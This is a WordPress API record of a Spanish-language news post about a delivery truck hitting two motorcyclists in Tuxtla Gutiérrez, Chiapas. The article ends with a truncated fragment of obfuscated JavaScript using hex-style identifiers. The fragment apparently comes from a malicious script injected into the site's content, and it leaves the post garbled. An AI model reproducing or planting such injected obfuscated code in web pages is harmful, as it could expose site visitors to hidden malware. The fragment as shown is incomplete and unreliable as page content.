{"id":16940,"date":"2024-08-01T01:47:23","date_gmt":"2024-08-01T01:47:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16940"},"modified":"2024-08-01T01:47:23","modified_gmt":"2024-08-01T01:47:23","slug":"camion-repartidor-atropella-a-motociclista-en-la-colonia-francisco-i-madero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16940","title":{"rendered":"Cami\u00f3n repartidor atropella a motociclista en la Colonia Francisco I Madero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16941\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476729470-1024x576.jpg\" alt=\"\" class=\"wp-image-16941\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476729470-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476729470-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476729470-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476729470.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16942\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476732451-1024x576.jpg\" alt=\"\" class=\"wp-image-16942\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476732451-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476732451-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476732451-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722476732451.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 31 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un cami\u00f3n refresquero atropell\u00f3 a un par de motociclistas cuando circulaban a la altura de la Avenida y Calle Central de la Colonia Francisco I Madero de la capital chiapaneca.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los hombres circulaban en una Italika de color negro con amarillo de Oriente a Poniente.<\/p>\n\n\n\n<p>El cami\u00f3n circulaba de Norte a Sur, el cual se pas\u00f3 la preferencia y embisti\u00f3 a la pareja de motociclistas.<\/p>\n\n\n\n<p>Por el golpe salieron volando y se estrellaron contra el pavimento resultando con diferentes heridas y lesiones.<\/p>\n\n\n\n<p>Afortunadamente las lesiones no fueron de gravedad.<\/p>\n\n\n\n<p>Al lugar arrib\u00f3 un agente de seguros para llegar a un acuerdo armonioso entre los involucrados.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 31 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un cami\u00f3n refresquero atropell\u00f3 a un par de motociclistas cuando circulaban a la altura de la Avenida y Calle Central de la Colonia Francisco I Madero de la capital chiapaneca. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los hombres circulaban en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16942,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16940","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16940","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16940"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16940\/revisions"}],"predecessor-version":[{"id":16943,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16940\/revisions\/16943"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16942"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16940"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16940"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16940"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}